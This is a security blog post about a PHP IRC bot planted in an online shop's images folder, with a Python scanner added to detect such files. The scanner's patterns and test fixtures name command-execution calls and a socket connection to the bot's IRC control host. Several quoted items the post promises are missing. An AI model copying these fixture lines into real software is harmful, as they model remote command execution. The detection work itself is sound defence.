E-commerce site hosts PHP IRC Bot

Here is an e-commerce website selling various items and taking payments online.

A malicious PHP script has been planted in the images folder, under an obscure name…

This is an IRC bot that lets whoever controls it execute commands on the server remotely.
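As an added example (not from the original post), here is a defender-side check for exactly this pattern: it walks a site's images folder and flags files with a script extension, image-named files that actually contain PHP, and content that references the C2 host quoted later in the post (irc.onetcr3.com), opens an IRC socket, or calls a command-execution function. The directory, file names and file contents in `demo()` are constructed fixtures, not the real bot.

```python
import os
import re
import tempfile

# Extensions that should never appear under a static images directory.
SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}

# Content indicators: the C2 host is the one quoted in the post; the rest are
# generic signs of PHP code, an IRC connection and command execution.
INDICATORS = [
    ("php open tag", re.compile(rb"<\?php", re.I)),
    ("C2 host from the post", re.compile(rb"irc\.onetcr3\.com", re.I)),
    ("socket to IRC port", re.compile(rb"fsockopen\s*\([^)]*6667", re.I)),
    ("command execution", re.compile(rb"\b(exec|shell_exec|system|passthru|popen)\s*\(", re.I)),
]

def scan_file(path: str) -> list:
    """Return the reasons a file looks like a planted PHP script (empty if clean)."""
    reasons = []
    if os.path.splitext(path)[1].lower() in SCRIPT_EXTS:
        reasons.append("script extension inside images folder")
    with open(path, "rb") as fh:
        head = fh.read(64 * 1024)  # bounded read: bot scripts are small, images can be huge
    for label, pattern in INDICATORS:
        if pattern.search(head):
            reasons.append(label)
    return reasons

def scan_images_dir(root: str) -> list:
    """Walk an images directory; return (relative path, reasons) for every suspicious file."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            reasons = scan_file(full)
            if reasons:
                findings.append((os.path.relpath(full, root), reasons))
    return findings

def demo() -> list:
    """Constructed images folder: one clean PNG plus two planted, non-functional fixtures."""
    root = tempfile.mkdtemp(prefix="images_")
    with open(os.path.join(root, "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    with open(os.path.join(root, "x7q2.php"), "wb") as fh:  # obscure name, constructed
        fh.write(b"<?php $s = fsockopen('irc.onetcr3.com', 6667); exec($cmd); ?>")
    with open(os.path.join(root, "banner.gif"), "wb") as fh:  # PHP hiding behind an image name
        fh.write(b"GIF89a<?php system($cmd); ?>")
    return scan_images_dir(root)
```

Run `demo()` to see the two planted files reported with their reasons while the real PNG stays silent; point `scan_images_dir` at a live upload or images directory to use it as a periodic integrity check.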

Bots in themselves are not necessarily bad; there are in fact some legitimate uses. However, I highly doubt this one is ;-)

In the source code, you can see the name “irc.onetcr3.com”. Onetcr3 is a group of hackers heavily involved in writing malicious bots, including exploit code for known (and maybe unknown) vulnerabilities.

They are credited with making:

a Perl IRC bot with a vBulletin DoS exploit;

a remote shell;

WordPress vulnerabilities (exploit code):

Several clues suggest that some members of this group are Indonesian:

The WordPress exploit archives page shows this at the bottom:

Then there is a blog (translated from Indonesian) where what looks like an Indonesian hacker is thanking his peers:

Last but not least, someone posted on a freelancing site:

I guess one could infiltrate their IRC channel to learn more but that’s for another day ;-)

Jerome Segura